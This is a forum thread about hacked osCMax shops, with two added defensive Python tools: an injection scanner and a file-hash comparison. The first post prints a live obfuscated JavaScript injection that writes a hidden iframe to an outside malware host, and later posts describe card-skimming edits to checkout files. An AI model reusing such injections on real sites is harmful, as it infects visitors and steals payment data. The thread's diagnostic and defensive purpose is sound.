
Thread: Website Recently Hacked

  1. #1
    deju
    Guest


    Website Recently Hacked

    My osCMax-based site was recently hacked and a JavaScript redirect was inserted in the index.php file. A friend of mine also has an osCMax site (which is currently not in use), and it has also been compromised by the same hack.
    If you go to http://www.cuddlyslippers.com using Internet Explorer, you can see the hack in action. It redirects to a different site after a few seconds:
    Code:
    http://liveinternetstatistics.ws/package/getfile.php?f=vispdf
    The hacked redirect only manifests itself when viewing the site through Microsoft Internet Explorer, not Firefox; however, if you view the source code, you can see the hacked code which has been added to the file:
    Code:
    <html><body><script  type="text/javascript">
    document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%6C%69%76%65%69%6E%74%65%72%6E%65%74%73%74%61%74%69%73%74%69%63%73%2E%77%73%2F%70%61%63%6B%61%67%65%2F%27%20%77%69%64%74%68%3D%27%31%27%20%68%65%69%67%68%74%3D%27%31%27%20%73%74%79%6C%65%3D%27%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%27%3E%3C%2F%69%66%72%61%6D%65%3E'));
    </script></body></html>
    Does anyone have an idea how the index.php has been hacked? Any help in preventing any such attacks in the future would be greatly appreciated!
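
Added example, not part of the original post: a Python scanner for injections of the `document.write(unescape('...'))` shape quoted above. It decodes the percent-encoded argument and reports any iframe or script tag the payload writes, with its `src` and whether it is styled to be invisible. The sample input is constructed and uses the placeholder host example.invalid; the function and class names are hypothetical.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# unescape('...') or unescape("...") anywhere in a file's text.
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)


class TagCollector(HTMLParser):
    """Collect iframe/script start tags and whether they are styled to hide."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "script"):
            return
        a = {k: (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                  or "visibility:hidden" in style or "display:none" in style)
        self.found.append({"tag": tag, "src": a.get("src", ""), "hidden": hidden})


def scan_text(text):
    """Decode every unescape() argument in text and list the tags it writes."""
    findings = []
    for match in UNESCAPE_RE.finditer(text):
        # Latin-1 mirrors how JavaScript's unescape() maps %XX to one character
        # (%uXXXX escapes are not handled in this example).
        decoded = unquote(match.group(2), encoding="latin-1")
        parser = TagCollector()
        parser.feed(decoded)
        parser.close()
        findings.append({"decoded": decoded, "tags": parser.found})
    return findings


# Constructed sample: same shape as the injected page, placeholder host.
PLAIN = ("<iframe src='http://example.invalid/pkg/' width='1' height='1' "
         "style='visibility: hidden;'></iframe>")
SAMPLE = ('<html><body><script type="text/javascript">\n'
          "document.write(unescape('" + "".join("%%%02X" % ord(c) for c in PLAIN)
          + "'));\n</script></body></html>")

if __name__ == "__main__":
    for finding in scan_text(SAMPLE):
        print(finding["decoded"], finding["tags"])
```

Run `scan_text` over the contents of each `.php`, `.html` and `.js` file in the web root; any finding with a hidden iframe pointing off-site marks a file to restore from a clean copy.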

  2. #2
    michael_s
    osCMax Developer
    Join Date: Jul 2002
    Location: Phoenix, AZ
    Posts: 23,134


    Re: Website Recently Hacked

    First, make sure your code is the latest osCMax 2.0 RC3.0.2 code. Next, there are several exploits out there that are very sophisticated and do not rely on a direct attack on your site, but an indirect attack. Your computer gets infected with a virus/trojan/malware from visiting another infected web site. This virus sends your FTP passwords (and other passwords) to a repository where they are then used to automatically log in to your FTP server, download and replace the files with infected copies. Yes, this is how it happens. I have seen it. The only way to prevent re-hacking of your site is to find and clean the infected computer that you are using, and change all your passwords.

    A quick search over at osCommerce.com will find a post with a lot of details about it:
    Hacker warning - osCommerce Community Support Forums

    Of course, there are about a half dozen other methods that could be used if your code is not updated to RC3.0.2.

    So, to recap here is what you need to do:

    1. Fully scan/clean all computers that you use to access your site via FTP
    2. Install a software firewall/malware-spyware blocker
    3. Change all your passwords
    4. Update your website's code to the latest osCMax release version.

  3. #3
    deju
    Guest


    Re: Website Recently Hacked

    Hi Michael,

    Thanks for the great advice. I've also come across a number of useful posts relating to oscommerce security in general, which some people might be interested in:

    How to secure an Oscommerce site

    How to secure your site. - osCommerce Community Support Forums

    Securing Your Oscommerce Install

    [tip] Securing your osCommerce install - osCommerce Forums

  4. #4
    heatherk
    Guest


    Re: Website Recently Hacked

    It appears that several sites I created with oscmax 2 rc 2 and 3 were hacked. I've found at least 4. I thought that they were up to date with the security fixes, but I'll have to go back through them. The index files were updated to force people to put their DOB in at checkout, and in one, that wasn't set up to accept credit cards, the PayPal file was changed so that credit card information had to be put in. My question is, how do I figure out if they are pulling or getting the credit card information as it's being input? Obviously on the one with the changed PayPal file they must have been, otherwise why change that file. For the other three sites, they are all set up with authorize.net. If the authorize.net transaction is going through, does this mean that it is ok and that the cc information is not being pulled?

  5. #5
    michael_s
    osCMax Developer


    Re: Website Recently Hacked

    First, check the dates on the files. If they were modified recently, check them. Compare against a stock file and look for changes. Inspect the differences closely.

    Look in checkout_process.php, and all your payment modules for changes.
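
The comparison against stock files described above, as an added example that is not part of the original post or of osCMax's code: hash every file in the live site and in an unpacked copy of the matching stock release, then list what was modified, added or missing. The function names, the demo tree and the `modules/sample_payment.php` path are constructed for illustration.

```python
import hashlib
import os
import tempfile


def hash_tree(root):
    """Map each file path (relative to root) to the SHA-256 of its contents."""
    digests = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            digests[os.path.relpath(full, root).replace(os.sep, "/")] = digest
    return digests


def compare_to_stock(live_root, stock_root):
    """Classify live files as modified, added or missing relative to stock."""
    live, stock = hash_tree(live_root), hash_tree(stock_root)
    return {
        "modified": sorted(p for p in live if p in stock and live[p] != stock[p]),
        "added": sorted(p for p in live if p not in stock),
        "missing": sorted(p for p in stock if p not in live),
    }


def demo():
    """Build two small constructed trees (not real osCMax files) and compare."""
    stock_files = {"index.php": "<?php // stock\n",
                   "checkout_process.php": "<?php // stock\n",
                   "modules/sample_payment.php": "<?php // stock\n"}
    with tempfile.TemporaryDirectory() as tmp:
        for side in ("stock", "live"):
            for rel, body in stock_files.items():
                path = os.path.join(tmp, side, rel)
                os.makedirs(os.path.dirname(path), exist_ok=True)
                with open(path, "w") as fh:
                    fh.write(body)
        # Constructed tampering: one edited payment module, one extra file.
        with open(os.path.join(tmp, "live", "modules/sample_payment.php"), "a") as fh:
            fh.write("// constructed change\n")
        with open(os.path.join(tmp, "live", "extra.php"), "w") as fh:
            fh.write("<?php // constructed extra file\n")
        return compare_to_stock(os.path.join(tmp, "live"), os.path.join(tmp, "stock"))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Hashes catch a changed file even when its date looks old; expect legitimate differences in configuration files and installed add-ons, and read each remaining difference line by line.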

  6. #6
    heatherk
    Guest


    Re: Website Recently Hacked

    Yes, that is how we realized that the first site was hacked - the paypal.ipn file date was recent. The hack looks like it is similar to the one described in this post:
    http://www.oscmax.com/forums/oscomme...ty-breech.html
    The checkout_process.php file was not changed. Is there a way to tell if the credit card info was being pulled - it's not stored anywhere on the site.

  7. #7
    heatherk
    Guest


    Re: Website Recently Hacked

    I found the file - it was checkout_confirmation.php - it was set up to send all the cc information to someone's email address. So, my next question is how do I go about finding all the security fixes that I need to stop this from happening? At least two of the sites that were hit had the last two security updates applied. But, I clearly have missed some security patches - other than searching through the forums under security - are they listed somewhere?

  8. #8
    heatherk
    Guest


    Re: Website Recently Hacked

    More specifically, one of the sites is running oscmax v 2 rc3, and had the xss security patch and the arbitrary upload exploit fix. We are pretty certain that the hacks are not a result of malware or spyware, so where else can I look for the fix that we missed that has created this problem?

  9. #9
    michael_s
    osCMax Developer


    Re: Website Recently Hacked

    Upgrade all sites to osCMax 2.0.1 stable. All security fixes are rolled into it.

    Also read my blog posts regarding security holes (link to my blog in my sig.)

  10. #10
    wkdwich
    Guest


    Re: Website Recently Hacked

    crap I typed a HUGE detailed response and it's all gone.. why does it do that I AM logged in.. but when I went to submit it said I was not.. will redo after dinner..

    and it did it again.. this time tho I put in my user pass instead of clicking back (hoping my dissertation was still there -- which it was not) and at least this posted.. more later
